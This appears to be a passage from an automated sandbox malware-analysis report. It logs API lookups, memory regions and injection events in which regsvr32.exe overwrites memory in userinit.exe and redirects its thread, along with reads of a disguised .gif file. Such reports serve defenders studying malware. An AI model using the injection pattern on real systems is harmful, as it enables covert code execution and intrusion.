Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Ôð$, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cf0266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cf02542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cf01d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cf0238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cf020c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cf01fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cf01e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cf01f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cf01ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cf0216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cf022be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cf021e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ceb20ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ceb20b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ceb20c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ceb20d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #33: userinit.exe

222

0

»

Information	Value
ID	#33
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:47, Reason: Child Process
Unmonitor	End Time: 00:01:51, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xfa4
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FA8 0x FAC 0x FB0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	rw	-
private_0x0000000000060000	0x00060000	0x00060fff	Private Memory	rwx	-
pagefile_0x0000000000070000	0x00070000	0x00076fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000080000	0x00080000	0x00081fff	Pagefile Backed Memory	rw	-
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	rw	-
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	r	-
oleaccrc.dll	0x00140000	0x00140fff	Memory Mapped File	r	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	rwx	-
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	r	-
private_0x0000000000190000	0x00190000	0x0019ffff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
pagefile_0x00000000002f0000	0x002f0000	0x003b7fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x005fffff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0061ffff	Private Memory	rw	-
private_0x0000000000620000	0x00620000	0x0071ffff	Private Memory	-	-
private_0x0000000000720000	0x00720000	0x0092ffff	Private Memory	rw	-
pagefile_0x0000000000720000	0x00720000	0x007fefff	Pagefile Backed Memory	r	-
private_0x0000000000800000	0x00800000	0x00880fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x00884fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x00888fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x0088cfff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x00890fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x00894fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x00898fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x0089cfff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008a0fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008a4fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008a8fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008acfff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008b0fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008b4fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008b8fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008bcfff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008c0fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008c4fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008c8fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008ccfff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008d0fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008d4fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008d8fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008dcfff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008e0fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008e4fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008e8fff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x008ecfff	Private Memory	rw	-
private_0x00000000008f0000	0x008f0000	0x0092ffff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x00a3ffff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009b2fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009b6fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009bafff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009befff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009c2fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009c6fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009cafff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009cefff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009d2fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009d6fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009dafff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009defff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009e2fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009e6fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009eafff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009eefff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009f2fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009f6fff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009fafff	Private Memory	rw	-
private_0x0000000000930000	0x00930000	0x009fefff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x009bffff	Private Memory	rw	-
private_0x0000000000a00000	0x00a00000	0x00a3ffff	Private Memory	rw	-
pagefile_0x0000000000a40000	0x00a40000	0x00e32fff	Pagefile Backed Memory	r	-
private_0x0000000000e40000	0x00e40000	0x00f4cfff	Private Memory	rw	-
userinit.exe	0x00fe0000	0x00fe8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000ff0000	0x00ff0000	0x01beffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01bf0000	0x0251ffff	Memory Mapped File	r	-
private_0x0000000002520000	0x02520000	0x0261ffff	Private Memory	rw	-
private_0x0000000002620000	0x02620000	0x0281ffff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028f2fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028f6fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028fafff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028fefff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02902fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02906fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0290afff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0290efff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02914fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02918fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0291cfff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02922fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02926fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0292afff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0292ffff	Private Memory	-	-
private_0x0000000002910000	0x02910000	0x02a00fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a16fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a1afff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a1efff	Private Memory	rw	-
private_0x0000000002930000	0x02930000	0x02a34fff	Private Memory	rw	-
private_0x0000000002930000	0x02930000	0x02a38fff	Private Memory	rw	-
private_0x0000000002930000	0x02930000	0x02a3cfff	Private Memory	rw	-
private_0x0000000002a10000	0x02a10000	0x02b02fff	Private Memory	rw	-
private_0x0000000002a20000	0x02a20000	0x02b20fff	Private Memory	rw	-
private_0x0000000002a40000	0x02a40000	0x02b52fff	Private Memory	rwx	-
private_0x0000000002b60000	0x02b60000	0x02c5ffff	Private Memory	-	-
private_0x0000000002c60000	0x02c60000	0x02d5ffff	Private Memory	rw	-
sortdefault.nls	0x02d60000	0x0302efff	Memory Mapped File	r	-
olepro32.dll	0x6ceb0000	0x6cec8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6ced0000	0x6cf53fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffda008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0xfa8, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ceb0000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6ced0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Ìî, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cf0266f	2	Fn
